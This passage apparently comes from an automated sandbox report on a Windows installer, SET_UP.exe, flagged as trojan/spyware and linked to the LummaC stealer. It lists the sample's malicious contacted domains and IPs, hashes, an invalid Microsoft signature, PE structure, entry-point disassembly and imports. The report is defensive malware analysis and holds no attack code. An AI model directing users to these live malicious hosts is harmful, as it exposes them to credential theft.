                                                                              https://cegu.shop/8574262446/ph.txtFWVOSET_UP.exe, 00000000.00000003.2089321840.000000000074C000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127400368.000000000074C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://klipvumisui.shop/int_clp_sha.txtackSET_UP.exe, 00000000.00000003.2089321840.000000000074C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://support.microsofSET_UP.exe, 00000000.00000003.1810684533.00000000036F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://throwupset.click/PtSET_UP.exe, 00000000.00000003.2089321840.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127414857.0000000000761000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?SET_UP.exe, 00000000.00000003.1837056968.000000000368E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://cegu.shop/9OFSET_UP.exe, 00000000.00000003.2089321840.000000000074C000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127400368.000000000074C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  http://www.remobjects.com/psSET_UP.exefalse
                                                                                    high
                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSET_UP.exe, 00000000.00000003.1810789852.0000000003682000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://throwupset.click/apimSET_UP.exe, 00000000.00000003.1849569046.0000000003658000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://throwupset.click/neSET_UP.exe, 00000000.00000003.1809485265.00000000006F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SET_UP.exe, 00000000.00000003.1810201151.000000000369B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1810287054.0000000003699000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://throwupset.click/SET_UP.exe, 00000000.00000002.4127414857.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1836344517.0000000003659000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1823842802.0000000003659000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://throwupset.click/8SET_UP.exe, 00000000.00000003.2089321840.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.4127414857.0000000000761000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        104.21.112.1
                                                                                        throwupset.clickUnited States
                                                                                        13335CLOUDFLARENETUStrue
                                                                                        185.161.251.21
                                                                                        cegu.shopUnited Kingdom
                                                                                        5089NTLGBfalse
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1583049
                                                                                        Start date and time:2025-01-01 17:19:10 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 7m 26s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:5
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:SET_UP.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@2/2
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 94%
                                                                                        • Number of executed functions: 35
                                                                                        • Number of non-executed functions: 176
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Override analysis time to 240s for sample files taking high CPU consumption
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 20.189.173.20, 4.245.163.56, 13.107.246.45
                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        TimeTypeDescription
                                                                                        11:20:14API Interceptor7x Sleep call for process: SET_UP.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        104.21.112.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                        • beammp.com/phpmyadmin/
                                                                                        185.161.251.21Setup.exeGet hashmaliciousLummaCBrowse
                                                                                          Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                              Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                setup.exeGet hashmaliciousLummaCBrowse
                                                                                                  Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                      #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                        installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          cegu.shopSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.161.251.21
                                                                                                          Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                          • 185.161.251.21
                                                                                                          Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.161.251.21
                                                                                                          Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                          • 185.161.251.21
                                                                                                          setup.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.161.251.21
                                                                                                          Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.161.251.21
                                                                                                          Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.161.251.21
                                                                                                          #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.161.251.21
                                                                                                          installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.161.251.21
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          NTLGBSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.161.251.21
                                                                                                          Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                          • 185.161.251.21
                                                                                                          Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.161.251.21
                                                                                                          Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                          • 185.161.251.21
                                                                                                          kwari.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 80.4.160.37
                                                                                                          setup.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.161.251.21
                                                                                                          Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.161.251.21
                                                                                                          Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.161.251.21
                                                                                                          #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.161.251.21
                                                                                                          CLOUDFLARENETUStest.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                          • 104.21.21.16
                                                                                                          test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                          • 104.21.21.16
                                                                                                          web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                          • 188.114.96.3
                                                                                                          test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                          • 104.21.21.16
                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 188.114.97.3
                                                                                                          qnUFsmyxMm.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.219.133
                                                                                                          Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.157.254
                                                                                                          yTcaknrrb8.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.92.91
                                                                                                          Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                          • 172.67.198.102
                                                                                                          eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                          • 104.21.38.84
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          a0e9f5d64349fb13191bc781f81f42e1web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.112.1
                                                                                                          • 185.161.251.21
                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.112.1
                                                                                                          • 185.161.251.21
                                                                                                          qnUFsmyxMm.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.112.1
                                                                                                          • 185.161.251.21
                                                                                                          Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.112.1
                                                                                                          • 185.161.251.21
                                                                                                          yTcaknrrb8.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.112.1
                                                                                                          • 185.161.251.21
                                                                                                          Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                          • 104.21.112.1
                                                                                                          • 185.161.251.21
                                                                                                          Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.112.1
                                                                                                          • 185.161.251.21
                                                                                                          Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.112.1
                                                                                                          • 185.161.251.21
                                                                                                          PASS-1234.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.112.1
                                                                                                          • 185.161.251.21
                                                                                                          Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.112.1
                                                                                                          • 185.161.251.21
                                                                                                          No context
                                                                                                          No created / dropped files found
                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Entropy (8bit):0.5550631812427133
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 97.75%
                                                                                                          • Windows ActiveX control (116523/4) 1.14%
                                                                                                          • Inno Setup installer (109748/4) 1.07%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          File name:SET_UP.exe
                                                                                                          File size:75'933'817 bytes
                                                                                                          MD5:c58fa8b1892d11fcce2893e637734a00
                                                                                                          SHA1:2b9a6350ed380ba9d025dcdff6c11a6b7533138f
                                                                                                          SHA256:3970f1b64c122f1d7917d4558747f4c91295f8d03b62cfa7ac0e5bf0f0c8b9a6
                                                                                                          SHA512:7fe0f4290c5148d9d9e36a67e1f493035fd4a7bea530ff1775012794f94b44ac710f6694bd394471ccdac1a4cacd7f4ffae83af8533799b7887a1f01c131286f
                                                                                                          SSDEEP:24576:8tdAm9DUi/CR3wCkCiRgoG7hB0hHkbEXXeG/jFt5JpoTx9aqi4M6OlCp3Qq/J:kqTytRdk6ek1Gi4JB
                                                                                                          TLSH:86F7D8DBE1AABB7187AF859D05A1C9EA5CBA7228332290E711ED3507EF1F4E40333515
                                                                                                          File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                          Icon Hash:33336d3733131317
                                                                                                          Entrypoint:0x50156c
                                                                                                          Entrypoint Section:.itext
                                                                                                          Digitally signed:true
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x57051F89 [Wed Apr 6 14:39:05 2016 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:5
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:5
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:5
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:f62b90e31eca404f228fcf7068b00f31
                                                                                                          Signature Valid:false
                                                                                                          Signature Issuer:CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                          Error Number:-2146869232
                                                                                                          Not Before, Not After
                                                                                                          • 15/12/2020 21:24:20 02/12/2021 21:24:20
                                                                                                          Subject Chain
                                                                                                          • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                          Version:3
                                                                                                          Thumbprint MD5:4068B1B0494EFA79F5A751DCCA8111CD
                                                                                                          Thumbprint SHA-1:914A09C2E02C696AF394048BCB8D95449BCD5B9E
                                                                                                          Thumbprint SHA-256:4A838904E732A380E2856A9D6FEE926E5C57EB59336292AC5D9E47C9B2C1ED13
                                                                                                          Serial:33000003DFFB6AE3F427ECB6A30000000003DF
                                                                                                          Instruction
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          add esp, FFFFFFF0h
                                                                                                          push ebx
                                                                                                          push esi
                                                                                                          push edi
                                                                                                          mov eax, 004FEBF4h
                                                                                                          call 00007F13F8B32892h
                                                                                                          push FFFFFFECh
                                                                                                          mov eax, dword ptr [00504E38h]
                                                                                                          mov eax, dword ptr [eax]
                                                                                                          mov ebx, dword ptr [eax+00000170h]
                                                                                                          push ebx
                                                                                                          call 00007F13F8B3373Dh
                                                                                                          and eax, FFFFFF7Fh
                                                                                                          push eax
                                                                                                          push FFFFFFECh
                                                                                                          mov eax, dword ptr [00504E38h]
                                                                                                          push ebx
                                                                                                          call 00007F13F8B33992h
                                                                                                          xor eax, eax
                                                                                                          push ebp
                                                                                                          push 005015E7h
                                                                                                          push dword ptr fs:[eax]
                                                                                                          mov dword ptr fs:[eax], esp
                                                                                                          push 00000001h
                                                                                                          call 00007F13F8B330DDh
                                                                                                          call 00007F13F8C2823Ch
                                                                                                          mov eax, dword ptr [004FE82Ch]
                                                                                                          push eax
                                                                                                          push 004FE890h
                                                                                                          mov eax, dword ptr [00504E38h]
                                                                                                          mov eax, dword ptr [eax]
                                                                                                          call 00007F13F8BA5CD1h
                                                                                                          call 00007F13F8C28290h
                                                                                                          xor eax, eax
                                                                                                          pop edx
                                                                                                          pop ecx
                                                                                                          pop ecx
                                                                                                          mov dword ptr fs:[eax], edx
                                                                                                          jmp 00007F13F8C2AEDBh
                                                                                                          jmp 00007F13F8B2DFB9h
                                                                                                          call 00007F13F8C2800Ch
                                                                                                          mov eax, 00000001h
                                                                                                          call 00007F13F8B2EA7Ah
                                                                                                          call 00007F13F8B2E3FDh
                                                                                                          mov eax, dword ptr [00504E38h]
                                                                                                          mov eax, dword ptr [eax]
                                                                                                          mov edx, 0050177Ch
                                                                                                          call 00007F13F8BA57DCh
                                                                                                          push 00000005h
                                                                                                          mov eax, dword ptr [00504E38h]
                                                                                                          mov eax, dword ptr [eax]
                                                                                                          mov eax, dword ptr [eax+00000170h]
                                                                                                          push eax
                                                                                                          call 00007F13F8B33953h
                                                                                                          mov eax, dword ptr [00504E38h]
                                                                                                          mov eax, dword ptr [eax]
                                                                                                          mov edx, dword ptr [004D9740h]
                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x10d0000x3840.idata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1130000x7a800.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x48686a90x21d0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x1120000x18.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x10da800x88c.idata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000xfe0840xfe2003044a4ce137d68475f70dea21e4ce7e6False0.4823017861534678data6.478461863496819IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .itext0x1000000x17880x1800030d751d7e20e11f863bdb27a950c708False0.5203450520833334data5.94899155660316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .data0x1020000x30680x32002f90c6f68c18651f5b580d5ad2b852e9False0.421796875data4.334644118113417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .bss0x1060000x61940x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .idata0x10d0000x38400x3a00e31e730fc86b9dac8932bd3f92752751False0.31041217672413796data5.202469592139362IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .tls0x1110000x3c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .rdata0x1120000x180x200d6264f4705ad03600aa29f24c89eb799False0.05078125MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q"0.20544562813451883IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .rsrc0x1130000x7a8000x7a800366f9274464089d02085cadf6ef076ecFalse0.6188596141581633data7.432825654593137IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          RT_CURSOR0x113d640x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                          RT_CURSOR0x113e980x134dataEnglishUnited States0.4642857142857143
                                                                                                          RT_CURSOR0x113fcc0x134dataEnglishUnited States0.4805194805194805
                                                                                                          RT_CURSOR0x1141000x134dataEnglishUnited States0.38311688311688313
                                                                                                          RT_CURSOR0x1142340x134dataEnglishUnited States0.36038961038961037
                                                                                                          RT_CURSOR0x1143680x134dataEnglishUnited States0.4090909090909091
                                                                                                          RT_CURSOR0x11449c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                          RT_BITMAP0x1145d00x4e8Device independent bitmap graphic, 48 x 48 x 4, image size 11520.2945859872611465
                                                                                                          RT_BITMAP0x114ab80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.521551724137931
                                                                                                          RT_ICON0x114ba00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.6554054054054054
                                                                                                          RT_ICON0x114cc80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.5577956989247311
                                                                                                          RT_ICON0x114fb00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.46402439024390246
                                                                                                          RT_ICON0x1156180x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.5173410404624278
                                                                                                          RT_ICON0x115b800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.4778880866425993
                                                                                                          RT_ICON0x1164280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.4035181236673774
                                                                                                          RT_ICON0x1172d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6648936170212766
                                                                                                          RT_ICON0x1177380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5410412757973734
                                                                                                          RT_ICON0x1187e00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.45570539419087136
                                                                                                          RT_ICON0x11ad880xc539PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.999841549644477
                                                                                                          RT_STRING0x1272c40xecdata0.6059322033898306
                                                                                                          RT_STRING0x1273b00x250data0.47466216216216217
                                                                                                          RT_STRING0x1276000x28cdata0.4647239263803681
                                                                                                          RT_STRING0x12788c0x3e4data0.4347389558232932
                                                                                                          RT_STRING0x127c700x9cdata0.717948717948718
                                                                                                          RT_STRING0x127d0c0xe8data0.6293103448275862
                                                                                                          RT_STRING0x127df40x468data0.3820921985815603
                                                                                                          RT_STRING0x12825c0x38cdata0.3898678414096916
                                                                                                          RT_STRING0x1285e80x3dcdata0.39271255060728744
                                                                                                          RT_STRING0x1289c40x360data0.37037037037037035
                                                                                                          RT_STRING0x128d240x40cdata0.3783783783783784
                                                                                                          RT_STRING0x1291300x108data0.5113636363636364
                                                                                                          RT_STRING0x1292380xccdata0.6029411764705882
                                                                                                          RT_STRING0x1293040x234data0.5070921985815603
                                                                                                          RT_STRING0x1295380x3c8data0.3181818181818182
                                                                                                          RT_STRING0x1299000x32cdata0.43349753694581283
                                                                                                          RT_STRING0x129c2c0x2a0data0.41964285714285715
                                                                                                          RT_RCDATA0x129ecc0x82e8dataEnglishUnited States0.11261637622344235
                                                                                                          RT_RCDATA0x1321b40x10data1.5
                                                                                                          RT_RCDATA0x1321c40x1800PE32+ executable (console) x86-64, for MS WindowsEnglishUnited States0.3924153645833333
                                                                                                          RT_RCDATA0x1339c40x6b0data0.6466121495327103
                                                                                                          RT_RCDATA0x1340740x5b10PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS WindowsEnglishUnited States0.3255404941660947
                                                                                                          RT_RCDATA0x139b840x125Delphi compiled form 'TMainForm'0.7508532423208191
                                                                                                          RT_RCDATA0x139cac0x3a2Delphi compiled form 'TNewDiskForm'0.524731182795699
                                                                                                          RT_RCDATA0x13a0500x320Delphi compiled form 'TSelectFolderForm'0.53625
                                                                                                          RT_RCDATA0x13a3700x300Delphi compiled form 'TSelectLanguageForm'0.5703125
                                                                                                          RT_RCDATA0x13a6700x5d9Delphi compiled form 'TUninstallProgressForm'0.4562458249832999
                                                                                                          RT_RCDATA0x13ac4c0x461Delphi compiled form 'TUninstSharedFileForm'0.4335414808206958
                                                                                                          RT_RCDATA0x13b0b00x2092Delphi compiled form 'TWizardForm'0.2299112497001679
                                                                                                          RT_GROUP_CURSOR0x13d1440x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                          RT_GROUP_CURSOR0x13d1580x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                          RT_GROUP_CURSOR0x13d16c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                          RT_GROUP_CURSOR0x13d1800x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                          RT_GROUP_CURSOR0x13d1940x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                          RT_GROUP_CURSOR0x13d1a80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                          RT_GROUP_CURSOR0x13d1bc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                          RT_GROUP_ICON0x13d1d00x92dataEnglishUnited States0.636986301369863
                                                                                                          RT_VERSION0x13d2640x15cdataEnglishUnited States0.5689655172413793
                                                                                                          RT_MANIFEST0x13d3c00x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924
                                                                                                          DLLImport
                                                                                                          oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                          advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                                                                          user32.dllGetKeyboardType, LoadStringW, MessageBoxA, CharNextW
                                                                                                          kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
                                                                                                          kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
                                                                                                          user32.dllCreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, 